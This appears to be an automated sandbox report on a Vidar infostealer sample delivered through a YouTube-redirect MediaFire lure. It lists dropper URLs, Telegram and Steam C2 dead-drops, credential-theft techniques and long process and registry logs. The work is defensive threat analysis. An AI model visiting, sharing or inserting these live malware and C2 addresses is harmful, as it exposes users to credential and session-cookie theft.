vidar | hxxps://www[.]youtube[.]com/redirect?event=video_description&redir_token=QUFFLUhqbHF2a3pZUHhoTEpWVFAtZUVmaTJveFJzU0FHd3xBQ3Jtc0trLUZLV0tNYi1Lei1ISXFFdDNFWVgxcVM3MFB3Mld2WHhmUWhNdzA0cWhub29ZejVHeFF1bkRWZm5PdDh1MUtVRkZWbVFPTG5WVHM5bElfTHRha1J0UFBfenc0SWNSWTBQdUsxYW9hYnZyUmJmWnAwVQ&q=https%3A%2F%2Fmediafire[.]com%2Ffolder%2Fzu705r17nu876%2F&v=5Bj9xjVBA24

Analysis

max time kernel
497s
max time network
486s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
01/03/2025, 02:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbHF2a3pZUHhoTEpWVFAtZUVmaTJveFJzU0FHd3xBQ3Jtc0trLUZLV0tNYi1Lei1ISXFFdDNFWVgxcVM3MFB3Mld2WHhmUWhNdzA0cWhub29ZejVHeFF1bkRWZm5PdDh1MUtVRkZWbVFPTG5WVHM5bElfTHRha1J0UFBfenc0SWNSWTBQdUsxYW9hYnZyUmJmWnAwVQ&q=https%3A%2F%2Fmediafire.com%2Ffolder%2Fzu705r17nu876%2F&v=5Bj9xjVBA24

Score

10^/10

vidar ir7am credential_access discovery execution spyware stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://yaykisobakitop.top/kjlrfejkrfkrerfk3fkfrkerlkfr3ejhkRKFJKERKJFREWKJ34JK34JKDWK/lica

exe.dropper

https://yaykisobakitop.top/kjlrfejkrfkrerfk3fkfrkerlkfr3ejhkRKFJKERKJFREWKJ34JK34JKDWK/lica

Extracted

Family

vidar

Botnet

ir7am

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

Detect Vidar Stealer 14 IoCs

stealer

resource	yara_rule
behavioral1/memory/4584-1162-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1164-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1171-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1172-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1173-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1174-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1175-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1176-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1177-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1178-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1179-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1180-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1609-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral1/memory/4584-1610-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Blocklisted process makes network request 4 IoCs

flow	pid	Process
270	3316	powershell.exe
272	3316	powershell.exe
287	3476	powershell.exe
288	3476	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3316	powershell.exe
3476	powershell.exe
3076	powershell.exe
4868	powershell.exe

Downloads MZ/PE file 2 IoCs

flow	pid	Process
272	3316	powershell.exe
288	3476	powershell.exe

Uses browser remote debugging 2 TTPs 5 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
6112	chrome.exe
5184	chrome.exe
228	chrome.exe
4240	chrome.exe
3544	chrome.exe

Executes dropped EXE 9 IoCs

pid	Process
3592	Setup.exe
5164	7za.exe
5180	Setup.exe
5332	7za.exe
1760	7za.exe
5420	7za.exe
1532	7za.exe
2068	JKTAP89G.exe
4584	JKTAP89G.exe

Loads dropped DLL 2 IoCs

pid	Process
3592	Setup.exe
5180	Setup.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
36	mediafire.com
37	mediafire.com
38	mediafire.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2068 set thread context of 4584	2068	JKTAP89G.exe	185

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Program crash 1 IoCs

pid	pid_target	Process	procid_target
960	2068	WerFault.exe	184

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7za.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JKTAP89G.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JKTAP89G.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	JKTAP89G.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	JKTAP89G.exe

Delays execution with timeout.exe 4 IoCs

defense_evasion

pid	Process
6000	timeout.exe
5152	timeout.exe
2460	timeout.exe
2996	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133852703711749842"	chrome.exe

Modifies registry class 56 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "6"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000006bfa27446581db01d44a12486e81db01c1a19d4b538adb0114000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\NodeSlot = "7"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 = 200000001a00eebbfe2300001000ff325c4c9dbbb043b5b42d72e54eaaa400000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1095212214-1383118828-1037266802-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
3668	msedge.exe
3668	msedge.exe
5068	msedge.exe
5068	msedge.exe
4716	identity_helper.exe
4716	identity_helper.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
1388	msedge.exe
1388	msedge.exe
3316	powershell.exe
3316	powershell.exe
3316	powershell.exe
3076	powershell.exe
3076	powershell.exe
3076	powershell.exe
3476	powershell.exe
3476	powershell.exe
3476	powershell.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
4584	JKTAP89G.exe
4584	JKTAP89G.exe
4584	JKTAP89G.exe
4584	JKTAP89G.exe
4240	chrome.exe
4240	chrome.exe
1468	msedge.exe
1468	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 34 IoCs

pid	Process
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
4240	chrome.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	5752	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5752	AUDIODG.EXE
Token: SeRestorePrivilege	5768	7zG.exe
Token: 35	5768	7zG.exe
Token: SeSecurityPrivilege	5768	7zG.exe
Token: SeSecurityPrivilege	5768	7zG.exe
Token: SeRestorePrivilege	5164	7za.exe
Token: 35	5164	7za.exe
Token: SeSecurityPrivilege	5164	7za.exe
Token: SeSecurityPrivilege	5164	7za.exe
Token: SeDebugPrivilege	3316	powershell.exe
Token: SeDebugPrivilege	3076	powershell.exe
Token: SeIncreaseQuotaPrivilege	3076	powershell.exe
Token: SeSecurityPrivilege	3076	powershell.exe
Token: SeTakeOwnershipPrivilege	3076	powershell.exe
Token: SeLoadDriverPrivilege	3076	powershell.exe
Token: SeSystemProfilePrivilege	3076	powershell.exe
Token: SeSystemtimePrivilege	3076	powershell.exe
Token: SeProfSingleProcessPrivilege	3076	powershell.exe
Token: SeIncBasePriorityPrivilege	3076	powershell.exe
Token: SeCreatePagefilePrivilege	3076	powershell.exe
Token: SeBackupPrivilege	3076	powershell.exe
Token: SeRestorePrivilege	3076	powershell.exe
Token: SeShutdownPrivilege	3076	powershell.exe
Token: SeDebugPrivilege	3076	powershell.exe
Token: SeSystemEnvironmentPrivilege	3076	powershell.exe
Token: SeRemoteShutdownPrivilege	3076	powershell.exe
Token: SeUndockPrivilege	3076	powershell.exe
Token: SeManageVolumePrivilege	3076	powershell.exe
Token: 33	3076	powershell.exe
Token: 34	3076	powershell.exe
Token: 35	3076	powershell.exe
Token: 36	3076	powershell.exe
Token: SeRestorePrivilege	5332	7za.exe
Token: 35	5332	7za.exe
Token: SeSecurityPrivilege	5332	7za.exe
Token: SeSecurityPrivilege	5332	7za.exe
Token: SeDebugPrivilege	3476	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeIncreaseQuotaPrivilege	4868	powershell.exe
Token: SeSecurityPrivilege	4868	powershell.exe
Token: SeTakeOwnershipPrivilege	4868	powershell.exe
Token: SeLoadDriverPrivilege	4868	powershell.exe
Token: SeSystemProfilePrivilege	4868	powershell.exe
Token: SeSystemtimePrivilege	4868	powershell.exe
Token: SeProfSingleProcessPrivilege	4868	powershell.exe
Token: SeIncBasePriorityPrivilege	4868	powershell.exe
Token: SeCreatePagefilePrivilege	4868	powershell.exe
Token: SeBackupPrivilege	4868	powershell.exe
Token: SeRestorePrivilege	4868	powershell.exe
Token: SeShutdownPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeSystemEnvironmentPrivilege	4868	powershell.exe
Token: SeRemoteShutdownPrivilege	4868	powershell.exe
Token: SeUndockPrivilege	4868	powershell.exe
Token: SeManageVolumePrivilege	4868	powershell.exe
Token: 33	4868	powershell.exe
Token: 34	4868	powershell.exe
Token: 35	4868	powershell.exe
Token: 36	4868	powershell.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe
Token: SeShutdownPrivilege	4240	chrome.exe
Token: SeCreatePagefilePrivilege	4240	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe
5068	msedge.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5984	OpenWith.exe
5708	SecHealthUI.exe
1468	msedge.exe
5068	msedge.exe
5068	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5068 wrote to memory of 3344	5068	msedge.exe	84
PID 5068 wrote to memory of 3344	5068	msedge.exe	84
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
PID 5068 wrote to memory of 2072	5068	msedge.exe	85
